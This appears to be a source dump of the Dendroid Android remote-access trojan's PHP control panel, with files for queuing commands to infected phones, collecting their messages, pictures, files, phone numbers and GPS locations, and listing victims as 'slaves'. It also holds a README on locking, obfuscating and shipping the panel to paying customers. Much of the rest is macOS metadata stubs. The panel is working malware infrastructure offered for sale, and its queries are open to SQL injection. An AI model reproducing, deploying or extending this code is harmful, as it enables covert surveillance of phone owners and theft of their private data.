"),e.click({option:this},function(t){return t.data.option.clicked()}),e.append(t),this.opts.show_label&&e.append(jQuery("
").html(this.label())),this.node.append(e),this.node},t}()}).call(this);
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/blockbot.php:
--------------------------------------------------------------------------------
1 | prepare("SELECT blocked FROM bots WHERE uid='$botid'");
19 | $statement->execute();
20 |
21 | $result = $statement->fetch(PDO::FETCH_ASSOC);
22 |
23 | $curblocked = $result[blocked];
24 |
25 | if($curblocked == "yes"){
26 | $statement = $connect->prepare("UPDATE bots SET blocked='no' WHERE `uid` = '$botid'");
27 | $statement->execute();
28 | echo "Bot History Unblocked";
29 | } else {
30 | $statement = $connect->prepare("UPDATE bots SET blocked='yes' WHERE `uid` = '$botid'");
31 | $statement->execute();
32 | echo "Bot History Blocked";
33 | }
34 | ?>
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/clearawaiting.php:
--------------------------------------------------------------------------------
1 |
2 | $url = "http://pizzachip.com/rat/";
3 |
4 | if (file_exists("config.php")) {
5 | include("config.php");
6 | } else {
7 | header('Location: setup/');
8 | }
9 |
10 | session_start();
11 | if (empty($_SESSION['code'])) {
12 | header( 'Location: index.php' ) ;
13 | die();
14 | }
15 |
16 | include("functions.php");
17 |
18 | $statement = $connect->prepare("TRUNCATE TABLE commands");
19 | $statement->execute();header('Location: settings.php');
20 |
21 | ?>
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/clearmessages.php:
--------------------------------------------------------------------------------
1 |
2 | $url = "http://pizzachip.com/rat/";
3 |
4 | if (file_exists("config.php")) {
5 | include("config.php");
6 | } else {
7 | header('Location: setup/');
8 | }
9 |
10 | session_start();
11 | if (empty($_SESSION['code'])) {
12 | header( 'Location: index.php' ) ;
13 | die();
14 | }
15 |
16 | include("functions.php");
17 |
18 | $statement = $connect->prepare("TRUNCATE TABLE messages");
19 | $statement->execute();header('Location: settings.php');
20 |
21 | ?>
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/deletebot.php:
--------------------------------------------------------------------------------
1 | prepare("DELETE FROM bots WHERE uid='$botid'");
21 | $statement->execute();
22 | echo "Bot Deleted";
23 | ?>
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/deletefile.php:
--------------------------------------------------------------------------------
1 | prepare("DELETE FROM files WHERE file='$filename'");
23 | $statement->execute();
24 | echo "Deleted";
25 | } else {
26 | die();
27 | }
28 | ?>
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/deletepics.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/filetable.php:
--------------------------------------------------------------------------------
1 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
40 |
41 |
42 |
43 |
44 |
45 | UID
46 | File
47 | Options
48 |
49 |
50 |
51 | query($getslaves) as $row) {
53 | $file = preg_replace("#\{(.*)\}#", "", $row['file']);
54 | echo '' . $row['uid'] . ' ';
55 | echo '' . $file . ' ';
56 | echo '
';
57 | }?>
58 |
59 |
60 |
61 |
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/functions.php:
--------------------------------------------------------------------------------
1 | getMessage() . "
";
14 | die();
15 | }
16 |
17 | function slave_exists($UID) {
18 | global $connect;
19 | $statement = $connect->prepare('SELECT * FROM bots WHERE uid=:uid');
20 | $statement->bindParam(':uid', $UID, PDO::PARAM_STR);
21 | $statement->execute();
22 | $row = $statement->fetch(PDO::FETCH_ASSOC);
23 | if(!$row){
24 | return false;
25 | } else {
26 | return true;
27 | }
28 | }
29 |
30 | function setFunction($UID, $Function){
31 | $UID = sanitize($UID);
32 | $Function = sanitize($Function);
33 | if(slave_exists($UID)){
34 | $functions = getFunction($UID);
35 | if($functions == ""){
36 | mysql_query("UPDATE slaves SET Function='$Function' WHERE `Unique_ID` = '$UID'") or die(mysql_error());
37 | } else {
38 | $functions = $functions . ", " . $Function;
39 | mysql_query("UPDATE slaves SET Function='$functions' WHERE `Unique_ID` = '$UID'") or die(mysql_error());
40 | }
41 | }
42 | }
43 |
44 | function updateSlave($UID, $Device, $Version, $Coordinates, $Provider, $PhoneNumber, $SDK, $Random){
45 | $remove = array("(", ")");
46 | $cleancoords = str_replace($remove, "", $Coordinates);
47 | $splitcoords = explode(",", $cleancoords);
48 | $Lati = $splitcoords[0];
49 | $Longi = $splitcoords[1];
50 |
51 | global $connect;
52 |
53 | if (slave_exists($UID)){
54 | $statement = $connect->prepare("UPDATE bots SET device='$Device', version='$Version', lati='$Lati', longi='$Longi', provider='$Provider', phone='$PhoneNumber', sdk='$SDK', random='$Random' WHERE `uid` = '$UID'");
55 | $statement->execute();
56 | } else {
57 | $statement = $connect->prepare("INSERT INTO `bots` (`uid`, `device`, `version`, `lati`, `longi`, `provider`, `phone`, `sdk`, `random`) VALUES ('$UID', '$Device', '$Version', '$Lati', '$Longi', '$Provider', '$PhoneNumber', '$SDK', '$Random')");
58 | $statement->execute();
59 | }
60 | }
61 |
62 | function addMessage($UID, $Message) {
63 | global $connect;
64 | $statement = $connect->prepare("INSERT INTO `messages` (`uid`, `message`) VALUES ('$UID', '$Message')");
65 | $statement->execute();
66 | }
67 |
68 | function addToUploads($owner, $slave, $file){
69 | if(slave_exists($slave)){
70 | if(file_exists("dlfiles/" . $file)){
71 | global $connect;
72 | $statement = $connect->prepare("INSERT INTO `files` (`uid`, `file`) VALUES ('$slave', '$file')");
73 | $statement->execute();
74 | }
75 | }
76 | }
77 | ?>
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/get-functions.php:
--------------------------------------------------------------------------------
1 | query($getcommands) as $row) {
19 | if ($row['arg1'] == "" AND $row['arg2'] == "") {
20 | echo $row['command'] . "()\xA";
21 | } elseif ($row['arg1'] == "") {
22 | echo $row['command'] . "(" . $row['arg2'] . ")\xA";
23 | } elseif ($row['arg2'] == "") {
24 | echo $row['command'] . "(" . $row['arg1'] . ")\xA";
25 | } elseif ($row['arg3'] != "") {
26 | echo $row['command'] . "(" . $row['arg1'] . "~~" . $row['arg2'] . "~~" . $row['arg3'] . ")\xA";
27 | } else {
28 | echo $row['command'] . "(" . $row['arg1'] . "~~" . $row['arg2'] . ")\xA";
29 | }
30 | }
31 |
32 | $statement = $connect->prepare("DELETE FROM commands WHERE uid='$UID'");
33 | $statement->execute();
34 | ?>
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/get.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/getimages.php:
--------------------------------------------------------------------------------
1 | prepare("INSERT INTO `commands` (`uid`, `command`, `arg1`, `arg2`, `arg3`) VALUES ('$uid', 'uploadpictures', '$startdate', '$enddate', '$maxfilesize')");
11 | $statement->execute();
12 |
13 | ?>
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/getmessages.php:
--------------------------------------------------------------------------------
1 | query($mycommand) as $row) {
10 | $spacedmessage = str_replace("*", " ", $row['message']);
11 | echo $spacedmessage;
12 | echo "
";
13 | }
14 | } else {
15 | $mycommand = "SELECT * FROM messages";
16 |
17 | foreach ($connect->query($mycommand) as $row) {
18 | $spacedmessage = str_replace("*", " ", $row['message']);
19 | echo "
" . $row['uid'] . ": ";
20 | echo $spacedmessage;
21 | echo "
";
22 | }
23 | }
24 |
25 | ?>
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/getwaitingcommands.php:
--------------------------------------------------------------------------------
1 | query($mycommand) as $row) {
7 | echo "
" . $row['uid'] . ": " . $row['command'] . "(" . $row['arg1'] . ", " . $row['arg2'] . ")";
8 | echo "
";
9 | }
10 |
11 | ?>
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/index.php:
--------------------------------------------------------------------------------
1 |
22 |
23 |
24 |
25 |
26 |
27 |
Login
28 |
29 |
30 |
31 |
62 |
63 |
64 |
73 |
74 |
75 |
76 |
77 |
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/login.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/logout.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/message.php:
--------------------------------------------------------------------------------
1 | prepare("SELECT blocked FROM bots WHERE uid='$botid'");
7 | $statement->execute();
8 |
9 | $result = $statement->fetch(PDO::FETCH_ASSOC);
10 |
11 | $curblocked = $result[blocked];
12 |
13 |
14 | if(isset($_GET['UID'], $_GET['Data']) AND $curblocked != 'yes'){
15 | $gooddata = str_replace("~period", ".", $_GET['Data']);
16 | addMessage($_GET['UID'], $gooddata);
17 | } else {
18 | die();
19 | }
20 | ?>
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/new-upload.php:
--------------------------------------------------------------------------------
1 | 0)
20 | {
21 | $error = "Return Code: " . $_FILES["file"]["error"];
22 | }
23 | else
24 | {
25 | $file = "{" . md5(rand(1000, 9999) . time()) . "}" . $_FILES["file"]["name"];
26 | if(move_uploaded_file($_FILES["file"]["tmp_name"], "dlfiles/" . $file))
27 | {
28 | $owner = "";
29 | addToUploads($owner, $_GET["UID"], $file);
30 | $error = "File has been uploaded";
31 | }
32 | }
33 | }
34 | else
35 | {
36 | $error = "Invalid file";
37 | }
38 | }
39 | else
40 | {
41 | $error = "Invalid password";
42 | }
43 | }
44 | else
45 | {
46 | $error = "file not set";
47 | }
48 | }
49 | else
50 | {
51 | $error = "Password or UID not set";
52 | }
53 |
54 | $f = fopen("log.txt", "a+");
55 | if($f)
56 | {
57 | $srv = print_r($_SERVER, true);
58 | $fls = print_r($_FILES, true);
59 | $gt = print_r($_GET, true);
60 | $pst = print_r($_POST, true);
61 |
62 | $fmt = "Error: \r\n";
63 | $fmt .= $error . "\r\n";
64 | $fmt .= "-----------------------------------------\r\n";
65 |
66 | $fmt .= "Server: \r\n";
67 | $fmt .= $srv . "\r\n";
68 | $fmt .= "-----------------------------------------\r\n";
69 |
70 | $fmt .= "Files: \r\n";
71 | $fmt .= $fls . "\r\n";
72 | $fmt .= "-----------------------------------------\r\n";
73 |
74 | $fmt .= "Get: \r\n";
75 | $fmt .= $gt . "\r\n";
76 | $fmt .= "-----------------------------------------\r\n";
77 |
78 | $fmt .= "Post: \r\n";
79 | $fmt .= $pst . "\r\n";
80 | $fmt .= "-----------------------------------------\r\n";
81 |
82 | fwrite($f, $fmt);
83 | fclose($f);
84 | }
85 | ?>
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/reg.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/setup/createconfig.php:
--------------------------------------------------------------------------------
1 | ";
59 |
60 | fwrite($f, $write);
61 | fclose($f);
62 | }
63 |
64 | header('Location: laststep.php');
65 | ?>
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/setup/index.php:
--------------------------------------------------------------------------------
1 |
16 |
17 |
18 |
19 |
20 |
21 |
Setup
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
68 |
69 |
70 |
First Time Setup
71 |
Welcome to first time setup. This process will aid you in the configuration of your account, your database, and a few other settings. This software requires PHP 5.2 and above. You have: . It also requires a MySQL database, which you will setup later. Lastly, it requires that you access the panel from a web browser that has up-to-date HTML5 features. The control panel was developed with the aid of Google Chrome and is guaranteed to display and function correctly in it. If you are ready to proceed, click the button below:
Begin Setup
72 |
73 |
74 |
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/setup/laststep.php:
--------------------------------------------------------------------------------
1 |
16 |
17 |
18 |
19 |
20 |
21 |
Setup: Last Step
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
68 |
69 |
70 |
Setup Complete
71 |
Thank you for completing first time setup. Everything you just setup can be changed in the Panel Settings. Please delete the setup folder before continuing. It is not required, but recommended for security purposes. If you are ready to continue to the Control Panel, click the button below:
Finish Setup
72 |
73 |
74 |
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/showpictures.php:
--------------------------------------------------------------------------------
1 | Delete All
';
9 | foreach($images as $image) {
10 | echo '
';
11 | }
12 | ?>
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/table.php:
--------------------------------------------------------------------------------
1 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
76 |
77 |
78 |
79 |
80 |
81 | #
82 | UID
83 | Status
84 | Last Updated
85 | Cell #
86 | Cell Provider
87 | Location
88 | Device
89 | SDK
90 | Version
91 | Add
92 |
93 |
94 |
95 | query($getslaves) as $row) {
96 | $today = time();
97 | $origdate = strtotime($row['update']);
98 | $secdiff = $today - $origdate;
99 | $mindiff = $secdiff / 60;
100 |
101 | if ($mindiff > $offlineminutes) {
102 | $status = "Offline";
103 | } else {
104 | $status = "Online";
105 | }
106 |
107 | $datetime = new DateTime($row['update']);
108 | $timezone = new DateTimeZone($timezonesetting);
109 | $datetime->setTimezone($timezone);
110 | $lastupdatetime = $datetime->format("Y-m-d H:i:s");
111 |
112 | echo '' . $row['id'] . ' ';
113 | echo '' . $row['uid'] . ' ';
114 | echo '' . $status . ' ';
115 | echo '' . $lastupdatetime . ' ';
116 | echo '' . $row['phone'] . ' ';
117 | echo '' . $row['provider'] . ' ';
118 | echo '(' . $row['lati'] . ', ' . $row['longi'] . ') ';
119 | echo '' . $row['device'] . ' ';
120 | echo '' . $row['sdk'] . ' ';
121 | echo '' . $row['version'] . ' ';
122 | echo '+
';
123 | }?>
124 |
125 |
126 |
127 |
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/Panel/upload-pictures.php:
--------------------------------------------------------------------------------
1 | 0)
20 | {
21 | $error = "Return Code: " . $_FILES["file"]["error"];
22 | }
23 | else
24 | {
25 | $file = "{" . md5(rand(1000, 9999) . time()) . "}" . $_FILES["file"]["name"];
26 | if(!is_dir("dlfiles/" . $_GET['UID'] . "/")){ mkdir("dlfiles/" . $_GET['UID'] . "/"); }
27 | if(move_uploaded_file($_FILES["file"]["tmp_name"], "dlfiles/" . $_GET['UID'] . "/" . $file))
28 | {
29 | $error = "File has been uploaded";
30 | }
31 | }
32 | }
33 | else
34 | {
35 | $error = "Invalid file";
36 | }
37 | }
38 | else
39 | {
40 | $error = "Invalid password";
41 | }
42 | }
43 | else
44 | {
45 | $error = "file not set";
46 | }
47 | }
48 | else
49 | {
50 | $error = "Password or UID not set";
51 | }
52 | ?>
--------------------------------------------------------------------------------
/master/Dendroid Panel/Dendroid Panel/README - How to ship to customers.txt:
--------------------------------------------------------------------------------
1 | ______ _______ _ ______ _______ _______ _________ ______
2 | ( __ \ ( ____ \( ( /|( __ \ ( ____ )( ___ )\__ __/( __ \
3 | | ( \ )| ( \/| \ ( || ( \ )| ( )|| ( ) | ) ( | ( \ )
4 | | | ) || (__ | \ | || | ) || (____)|| | | | | | | | ) |
5 | | | | || __) | (\ \) || | | || __)| | | | | | | | | |
6 | | | ) || ( | | \ || | ) || (\ ( | | | | | | | | ) |
7 | | (__/ )| (____/\| ) \ || (__/ )| ) \ \__| (___) |___) (___| (__/ )
8 | (______/ (_______/|/ )_)(______/ |/ \__/(_______)\_______/(______/
9 |
10 |
11 | This file contains instructions on how to 1. Setup URL locking, 2. ionCube the panel, and 3. Pack it up for delivery.
12 |
13 | Something to consider:
14 | 1. Don't mention reg.php to the customers, the more they know about the URL locking system, the easier it is for them to crack our protection and share the panel freely.
15 | If they don't know what reg.php is, we are probably better off.
16 |
17 | I. URL LOCKING
18 | 1. Open Panel/reg.php in Notepad++ (Recommended) or similar text editing application.
19 | 2. Change "www.pizzachip.com" and "pizzachip.com" on line 1 to the domain the customer has specified.
20 | 2-1. For example: $allowedDomains = array("www.androidcapture.com", "androidcapture.com");
21 | 3. Save reg.php
22 |
23 | II. ionCube
24 | 1. Visit http://ioncube.com
25 | 2. Login to your ionCube account.
26 | 3. Click "Encode" or visit https://www.ioncube.com/main.php?c=encode
27 | 4. ZIP the files inside of the Panel folder.
28 | 5. "Choose File" on ionCube.com and select the ZIP.
29 | 6. Make sure only "Allow short open tags ( ?>)" is checked.
30 | 7. Set "Encoder Selection" to "8.0"
31 | 8. Set "Source Language" to "PHP 5.3"
32 | 9. Click "Upload"
33 | 10. When the "Download" button appears, click it.
34 |
35 | III. Final Packing
36 | 1. Create a "Dendroid" folder, and create a folder inside of that folder named "HTTP Panel"
37 | 1. Extract the ZIP file you downloaded in Section II, Step 10 to the "HTTP Panel" folder.
38 | 2. Ensure there is a "dlfiles" folder, along with "assets" and "setup"
39 | 2-1. If there is no "dlfiles" folder, create one.
40 | 3. Copy the "README" and "SQL" files from the "Other Files" folder you have into the "Dendroid" folder.
41 | 4. Ensure your finished folder structure for the clients looks like this:
42 |
43 | "Dendroid" =>
44 | "README.txt"
45 | "SQL.sql"
46 | "HTTP Panel" =>
47 | "assets"
48 | "setup" =>
49 | "createconfig.php"
50 | "index.php"
51 | "laststep.php"
52 | "step1.php"
53 | "dlfiles"
54 | "addcommand.php"
55 | "applysettings.php"
56 | "blockbot.php"
57 | "clearawaiting.php"
58 | "clearmessages.php"
59 | "control.php"
60 | "deletebot.php"
61 | "deletefile.php"
62 | "deletepics.php"
63 | "filetable.php"
64 | "functions.php"
65 | "get-functions.php"
66 | "get.php"
67 | "getimages.php"
68 | "getmessages.php"
69 | "getawaitingcommands.php"
70 | "index.php"
71 | "login.php"
72 | "logout.php"
73 | "message.php"
74 | "new-upload.php"
75 | "reg.php"
76 | "settings.php"
77 | "showpictures.php"
78 | "table.php"
79 | "upload-pictures.php"
80 |
81 | 5. ZIP the "Dendroid" folder.
82 | 6. Send to client.
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/._Dendroid Panel:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/._Dendroid Panel
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/._.DS_Store:
--------------------------------------------------------------------------------
1 | Mac OS X 2 F x ATTR x x
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/._Other Files:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/._Other Files
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/._Panel:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/._Panel
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/._README - How to ship to customers.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/._README - How to ship to customers.txt
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Other Files/._README.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Other Files/._README.txt
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Other Files/._SQL.sql:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Other Files/._SQL.sql
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._addcommand.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._addcommand.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._applysettings.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._applysettings.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._assets:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._assets
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._blockbot.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._blockbot.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._clearawaiting.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._clearawaiting.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._clearmessages.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._clearmessages.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._control.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._control.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._deletebot.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._deletebot.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._deletefile.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._deletefile.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._deletepics.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._deletepics.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._dlfiles:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._dlfiles
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._filetable.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._filetable.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._functions.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._functions.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._get-functions.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._get-functions.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._get.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._get.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._getimages.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._getimages.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._getmessages.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._getmessages.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._getwaitingcommands.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._getwaitingcommands.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._index.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._index.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._login.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._login.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._logout.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._logout.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._message.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._message.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._new-upload.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._new-upload.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._reg.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._reg.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._settings.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._settings.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._setup:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._setup
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._showpictures.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._showpictures.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._table.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._table.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._upload-pictures.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._upload-pictures.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._css:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._css
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._fonts:
--------------------------------------------------------------------------------
